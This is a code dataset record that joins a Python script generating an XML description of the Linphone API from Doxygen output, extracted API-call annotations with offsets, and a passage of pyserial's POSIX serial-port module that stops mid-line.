for argNode in argslistNode: argType = ''.join(argNode.find('./type').itertext()) argName = '' argNameNode = argNode.find('./declname') if argNameNode is not None: argName = ''.join(argNameNode.itertext()) if argType != 'void': argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs)) if len(argslist) > 0: paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem") if paramdescs: for arg in argslist.arguments: for paramdesc in paramdescs: if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text: if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t': n = paramdesc.find('.//bctbxlist') if n is not None: arg.containedType = n.text arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription')) missingDocWarning = '' for arg in argslist.arguments: if arg.description == None: missingDocWarning += "\t'" + arg.name + "' parameter not documented\n"; f = CFunction(name, returnarg, argslist) deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']") if deprecatedNode is not None: f.deprecated = True f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip() f.briefDoc = self.docparser.parse_description(node.find('./briefdescription')) f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription')) if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '': return None locationNode = node.find('./location') if locationNode is not None: f.location = locationNode.get('file') if not f.location.endswith('.h'): missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n"; if missingDocWarning != '': print(name + ":\n" + missingDocWarning) return f def __findCFunction(self, tree): memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']") for m in memberdefs: f = self.__parseCFunctionMemberdef(m) if f is not None: self.add(f) def initFromFiles(self, xmlfiles): trees = [] for f in xmlfiles: tree = None try: if self.verbose: print("Parsing XML file: " + f.name) tree = ET.parse(f) except ET.ParseError as e: print(e) if tree is not None: trees.append(tree) for tree in trees: self.__findCEnum(tree) for tree in trees: self.__findCStruct(tree) for tree in trees: self.__findCTypedef(tree) for tree in trees: self.__findCFunction(tree) self.__discoverClasses() def initFromDir(self, xmldir): files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ] self.initFromFiles(files) def check(self): for c in self.classes: for name, p in six.iteritems(c.properties): if p.getter is None and p.setter is not None: print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter") class Generator: def __init__(self, outputfile): self.__outputfile = outputfile def __generateEnum(self, cenum, enumsNode): enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() } if cenum.associatedTypedef is not None: enumNodeAttributes['name'] = cenum.associatedTypedef.name enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes) if cenum.briefDescription != '': enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription') enumBriefDescriptionNode.text = cenum.briefDescription enumNode.append(cenum.detailedDescription) if len(cenum.values) > 0: enumValuesNode = ET.SubElement(enumNode, 'values') for value in cenum.values: enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() } valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes) if value.briefDescription != '': valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription') valueBriefDescriptionNode.text = value.briefDescription valueNode.append(value.detailedDescription) def __generateFunction(self, parentNode, nodeName, f): functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() } if f.location is not None: functionAttributes['location'] = f.location functionNode = ET.SubElement(parentNode, nodeName, functionAttributes) returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType } if f.returnArgument.containedType is not None: returnValueAttributes['containedtype'] = f.returnArgument.containedType returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes) if f.returnArgument.description is not None: returnValueNode.append(f.returnArgument.description) argumentsNode = ET.SubElement(functionNode, 'arguments') for arg in f.arguments: argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType } if arg.containedType is not None: argumentNodeAttributes['containedtype'] = arg.containedType argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes) if arg.description is not None: argumentNode.append(arg.description) if f.briefDescription != '': functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription') functionBriefDescriptionNode.text = f.briefDescription functionNode.append(f.detailedDescription) def __generateClass(self, cclass, classesNode): # Do not include classes that contain nothing if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \ len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0: return # Check the capabilities of the class has_ref_method = False has_unref_method = False has_destroy_method = False for methodname in cclass.instanceMethods: methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '') if methodname_without_prefix == 'ref': has_ref_method = True elif methodname_without_prefix == 'unref': has_unref_method = True elif methodname_without_prefix == 'destroy': has_destroy_method = True refcountable = False destroyable = False if has_ref_method and has_unref_method: refcountable = True if has_destroy_method: destroyable = True classNodeAttributes = { 'name' : cclass.name, 'cfunctionprefix' : cclass.cFunctionPrefix, 'deprecated' : str(cclass.deprecated).lower(), 'refcountable' : str(refcountable).lower(), 'destroyable' : str(destroyable).lower() } # Generate the XML node for the class classNode = ET.SubElement(classesNode, 'class', classNodeAttributes) if len(cclass.events) > 0: eventsNode = ET.SubElement(classNode, 'events') eventnames = [] for eventname in cclass.events: eventnames.append(eventname) eventnames.sort() for eventname in eventnames: self.__generateFunction(eventsNode, 'event', cclass.events[eventname]) if len(cclass.classMethods) > 0: classMethodsNode = ET.SubElement(classNode, 'classmethods') methodnames = [] for methodname in cclass.classMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname]) if len(cclass.instanceMethods) > 0: instanceMethodsNode = ET.SubElement(classNode, 'instancemethods') methodnames = [] for methodname in cclass.instanceMethods: methodnames.append(methodname) methodnames.sort() for methodname in methodnames: self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname]) if len(cclass.properties) > 0: propertiesNode = ET.SubElement(classNode, 'properties') propnames = [] for propname in cclass.properties: propnames.append(propname) propnames.sort() for propname in propnames: propertyNodeAttributes = { 'name' : propname } propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes) if cclass.properties[propname].getter is not None: self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter) if cclass.properties[propname].setter is not None: self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter) if cclass.briefDescription != '': classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription') classBriefDescriptionNode.text = cclass.briefDescription classNode.append(cclass.detailedDescription) def generate(self, project): print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'") apiNode = ET.Element('api') project.enums.sort(key = lambda e: e.name) if len(project.enums) > 0: enumsNode = ET.SubElement(apiNode, 'enums') for cenum in project.enums: self.__generateEnum(cenum, enumsNode) if len(project.classes) > 0: classesNode = ET.SubElement(apiNode, 'classes') project.classes.sort(key = lambda c: c.name) for cclass in project.classes: self.__generateClass(cclass, classesNode) s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8') s += ET.tostring(apiNode, 'utf-8') if project.prettyPrint: s = minidom.parseString(s).toprettyxml(indent='\t') self.__outputfile.write(s) def main(argv = None): if argv is None: argv = sys.argv argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.") argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.") argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true') argparser.add_argument('--pretty', help="XML pretty print", action='store_true') argparser.add_argument('xmldir', help="XML directory generated by doxygen.") args = argparser.parse_args() if args.outputfile == None: args.outputfile = open('api.xml', 'w') project = Project() if args.verbose: project.verbose = True if args.pretty: project.prettyPrint = True project.initFromDir(args.xmldir) project.check() gen = Generator(args.outputfile) gen.generate(project) if __name__ == "__main__": sys.exit(main())
[ "argparse.FileType", "os.listdir", "xml.etree.ElementTree.parse", "argparse.ArgumentParser", "metadoc.Parser", "xml.etree.ElementTree.tostring", "os.path.join", "xml.etree.ElementTree.Element", "xml.dom.minidom.parseString", "xml.etree.ElementTree.SubElement", "six.iteritems" ]
[((27754, 27839), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate XML version of the Linphone API."""'}), "(description='Generate XML version of the Linphone API.'\n )\n", (27777, 27839), False, 'import argparse\n'), ((6873, 6889), 'metadoc.Parser', 'metadoc.Parser', ([], {}), '()\n', (6887, 6889), False, 'import metadoc\n'), ((21658, 21710), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumsNode', '"""enum"""', 'enumNodeAttributes'], {}), "(enumsNode, 'enum', enumNodeAttributes)\n", (21671, 21710), True, 'import xml.etree.ElementTree as ET\n'), ((22676, 22731), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['parentNode', 'nodeName', 'functionAttributes'], {}), '(parentNode, nodeName, functionAttributes)\n', (22689, 22731), True, 'import xml.etree.ElementTree as ET\n'), ((22986, 23046), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""return"""', 'returnValueAttributes'], {}), "(functionNode, 'return', returnValueAttributes)\n", (22999, 23046), True, 'import xml.etree.ElementTree as ET\n'), ((23168, 23208), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""arguments"""'], {}), "(functionNode, 'arguments')\n", (23181, 23208), True, 'import xml.etree.ElementTree as ET\n'), ((24979, 25035), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classesNode', '"""class"""', 'classNodeAttributes'], {}), "(classesNode, 'class', classNodeAttributes)\n", (24992, 25035), True, 'import xml.etree.ElementTree as ET\n'), ((27044, 27061), 'xml.etree.ElementTree.Element', 'ET.Element', (['"""api"""'], {}), "('api')\n", (27054, 27061), True, 'import xml.etree.ElementTree as ET\n'), ((27539, 27568), 'xml.etree.ElementTree.tostring', 'ET.tostring', (['apiNode', '"""utf-8"""'], {}), "(apiNode, 'utf-8')\n", (27550, 27568), True, 'import xml.etree.ElementTree as ET\n'), ((20936, 20959), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (20948, 20959), False, 'import os\n'), ((21148, 21175), 'six.iteritems', 'six.iteritems', (['c.properties'], {}), '(c.properties)\n', (21161, 21175), False, 'import six\n'), ((21776, 21819), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""briefdescription"""'], {}), "(enumNode, 'briefdescription')\n", (21789, 21819), True, 'import xml.etree.ElementTree as ET\n'), ((21971, 22004), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumNode', '"""values"""'], {}), "(enumNode, 'values')\n", (21984, 22004), True, 'import xml.etree.ElementTree as ET\n'), ((23459, 23523), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['argumentsNode', '"""argument"""', 'argumentNodeAttributes'], {}), "(argumentsNode, 'argument', argumentNodeAttributes)\n", (23472, 23523), True, 'import xml.etree.ElementTree as ET\n'), ((23665, 23712), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['functionNode', '"""briefdescription"""'], {}), "(functionNode, 'briefdescription')\n", (23678, 23712), True, 'import xml.etree.ElementTree as ET\n'), ((25081, 25115), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""events"""'], {}), "(classNode, 'events')\n", (25094, 25115), True, 'import xml.etree.ElementTree as ET\n'), ((25388, 25428), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""classmethods"""'], {}), "(classNode, 'classmethods')\n", (25401, 25428), True, 'import xml.etree.ElementTree as ET\n'), ((25739, 25782), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""instancemethods"""'], {}), "(classNode, 'instancemethods')\n", (25752, 25782), True, 'import xml.etree.ElementTree as ET\n'), ((26095, 26133), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""properties"""'], {}), "(classNode, 'properties')\n", (26108, 26133), True, 'import xml.etree.ElementTree as ET\n'), ((26762, 26806), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['classNode', '"""briefdescription"""'], {}), "(classNode, 'briefdescription')\n", (26775, 26806), True, 'import xml.etree.ElementTree as ET\n'), ((27151, 27182), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""enums"""'], {}), "(apiNode, 'enums')\n", (27164, 27182), True, 'import xml.etree.ElementTree as ET\n'), ((27304, 27337), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['apiNode', '"""classes"""'], {}), "(apiNode, 'classes')\n", (27317, 27337), True, 'import xml.etree.ElementTree as ET\n'), ((27908, 27930), 'argparse.FileType', 'argparse.FileType', (['"""w"""'], {}), "('w')\n", (27925, 27930), False, 'import argparse\n'), ((20565, 20576), 'xml.etree.ElementTree.parse', 'ET.parse', (['f'], {}), '(f)\n', (20573, 20576), True, 'import xml.etree.ElementTree as ET\n'), ((20969, 20987), 'os.listdir', 'os.listdir', (['xmldir'], {}), '(xmldir)\n', (20979, 20987), False, 'import os\n'), ((22152, 22216), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['enumValuesNode', '"""value"""', 'enumValuesNodeAttributes'], {}), "(enumValuesNode, 'value', enumValuesNodeAttributes)\n", (22165, 22216), True, 'import xml.etree.ElementTree as ET\n'), ((26341, 26406), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['propertiesNode', '"""property"""', 'propertyNodeAttributes'], {}), "(propertiesNode, 'property', propertyNodeAttributes)\n", (26354, 26406), True, 'import xml.etree.ElementTree as ET\n'), ((22287, 22331), 'xml.etree.ElementTree.SubElement', 'ET.SubElement', (['valueNode', '"""briefdescription"""'], {}), "(valueNode, 'briefdescription')\n", (22300, 22331), True, 'import xml.etree.ElementTree as ET\n'), ((27602, 27624), 'xml.dom.minidom.parseString', 'minidom.parseString', (['s'], {}), '(s)\n', (27621, 27624), True, 'import xml.dom.minidom as minidom\n'), ((21007, 21030), 'os.path.join', 'os.path.join', (['xmldir', 'f'], {}), '(xmldir, f)\n', (21019, 21030), False, 'import os\n')]
import configparser import os dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path += '/cfg.ini' class Configuration(object): def __init__(self,debug=False): section = "Flask-debug" if debug else "Flask" cfg = configparser.ConfigParser() cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini") self.debug = cfg.getboolean(section, "DEBUG") self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED") self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE") self.port = cfg.getint(section,"PORT") self.host = cfg.get(section,"HOST")
[ "os.path.realpath", "configparser.ConfigParser" ]
[((62, 88), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (78, 88), False, 'import os\n'), ((256, 283), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (281, 283), False, 'import configparser\n')]
from multiprocessing import Pool import EnvEq as ee import numpy as np import itertools as it import os #parsing input into numpy arrays from input import * y0=np.array([y0_Tpos,y0_Tpro,y0_Tneg,y0_o2,y0_test]) p=np.array([p_o2,p_test]) mu=np.array([[mu_o2Tpos,mu_o2Tpro,mu_o2Tneg],[mu_testTpos,mu_testTpro,0]]) lam=np.array([lam_o2,lam_test]) t_D=np.array([t_DTpos,t_DTpro,t_DTneg]) r=np.array([r_Tpos,r_Tpro,r_Tneg]) delta=np.array([delta_Tpos,delta_Tpro,delta_Tneg]) rho=np.array([rho_Tpos,rho_Tpro,rho_Tneg]) lim=np.array([[[l_lim_o2Tpos,u_lim_o2Tpos],[l_lim_o2Tpro,u_lim_o2Tpro],[l_lim_o2Tneg,u_lim_o2Tneg]],[[l_lim_testTpos,u_lim_testTpos],[l_lim_testTpro,u_lim_testTpro],[0,0]]],dtype=np.float64) #make directories for saving raw_outputs try: os.makedirs("../../raw_output/EnvEq/"+f_name) except: pass #iterator over these o2_lim_arr=np.empty([0,2]) for ulim_Tpro in np.arange(0.1,1,0.2): for ulim_Tneg in np.arange(0.1,1,0.2): o2_lim_arr=np.append(o2_lim_arr,[[ulim_Tpro,ulim_Tneg]],axis=0) def solve_parm(u_lim_o2): #calls the solve_eq function with all default inputs other than o2_lim f_name_i=f_name+"{:.1f}".format(u_lim_o2[0])+"-"+"{:.1f}".format(u_lim_o2[1]) lim[0,1,1]=u_lim_o2[0] lim[0,2,1]=u_lim_o2[1] ee.solve_eq(t_max,dt,y0,p,mu,lam,r,K,delta,rho,lim,f_name_i) if __name__ == '__main__': pool = Pool(4) pool.map(solve_parm,o2_lim_arr) #iterate over the o2_lims pool.close() pool.join()
[ "EnvEq.solve_eq", "os.makedirs", "numpy.append", "numpy.array", "numpy.empty", "multiprocessing.Pool", "numpy.arange" ]
[((161, 214), 'numpy.array', 'np.array', (['[y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test]'], {}), '([y0_Tpos, y0_Tpro, y0_Tneg, y0_o2, y0_test])\n', (169, 214), True, 'import numpy as np\n'), ((213, 237), 'numpy.array', 'np.array', (['[p_o2, p_test]'], {}), '([p_o2, p_test])\n', (221, 237), True, 'import numpy as np\n'), ((240, 316), 'numpy.array', 'np.array', (['[[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]]'], {}), '([[mu_o2Tpos, mu_o2Tpro, mu_o2Tneg], [mu_testTpos, mu_testTpro, 0]])\n', (248, 316), True, 'import numpy as np\n'), ((316, 344), 'numpy.array', 'np.array', (['[lam_o2, lam_test]'], {}), '([lam_o2, lam_test])\n', (324, 344), True, 'import numpy as np\n'), ((348, 385), 'numpy.array', 'np.array', (['[t_DTpos, t_DTpro, t_DTneg]'], {}), '([t_DTpos, t_DTpro, t_DTneg])\n', (356, 385), True, 'import numpy as np\n'), ((386, 420), 'numpy.array', 'np.array', (['[r_Tpos, r_Tpro, r_Tneg]'], {}), '([r_Tpos, r_Tpro, r_Tneg])\n', (394, 420), True, 'import numpy as np\n'), ((425, 471), 'numpy.array', 'np.array', (['[delta_Tpos, delta_Tpro, delta_Tneg]'], {}), '([delta_Tpos, delta_Tpro, delta_Tneg])\n', (433, 471), True, 'import numpy as np\n'), ((474, 514), 'numpy.array', 'np.array', (['[rho_Tpos, rho_Tpro, rho_Tneg]'], {}), '([rho_Tpos, rho_Tpro, rho_Tneg])\n', (482, 514), True, 'import numpy as np\n'), ((517, 725), 'numpy.array', 'np.array', (['[[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [l_lim_o2Tneg,\n u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [l_lim_testTpro,\n u_lim_testTpro], [0, 0]]]'], {'dtype': 'np.float64'}), '([[[l_lim_o2Tpos, u_lim_o2Tpos], [l_lim_o2Tpro, u_lim_o2Tpro], [\n l_lim_o2Tneg, u_lim_o2Tneg]], [[l_lim_testTpos, u_lim_testTpos], [\n l_lim_testTpro, u_lim_testTpro], [0, 0]]], dtype=np.float64)\n', (525, 725), True, 'import numpy as np\n'), ((852, 868), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (860, 868), True, 'import numpy as np\n'), ((885, 907), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (894, 907), True, 'import numpy as np\n'), ((755, 802), 'os.makedirs', 'os.makedirs', (["('../../raw_output/EnvEq/' + f_name)"], {}), "('../../raw_output/EnvEq/' + f_name)\n", (766, 802), False, 'import os\n'), ((928, 950), 'numpy.arange', 'np.arange', (['(0.1)', '(1)', '(0.2)'], {}), '(0.1, 1, 0.2)\n', (937, 950), True, 'import numpy as np\n'), ((1261, 1332), 'EnvEq.solve_eq', 'ee.solve_eq', (['t_max', 'dt', 'y0', 'p', 'mu', 'lam', 'r', 'K', 'delta', 'rho', 'lim', 'f_name_i'], {}), '(t_max, dt, y0, p, mu, lam, r, K, delta, rho, lim, f_name_i)\n', (1272, 1332), True, 'import EnvEq as ee\n'), ((1361, 1368), 'multiprocessing.Pool', 'Pool', (['(4)'], {}), '(4)\n', (1365, 1368), False, 'from multiprocessing import Pool\n'), ((969, 1024), 'numpy.append', 'np.append', (['o2_lim_arr', '[[ulim_Tpro, ulim_Tneg]]'], {'axis': '(0)'}), '(o2_lim_arr, [[ulim_Tpro, ulim_Tneg]], axis=0)\n', (978, 1024), True, 'import numpy as np\n')]
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 <NAME> <<EMAIL>> # this is distributed under a free software license, see license.txt # # parts based on code from <NAME> <<EMAIL>>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. # try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 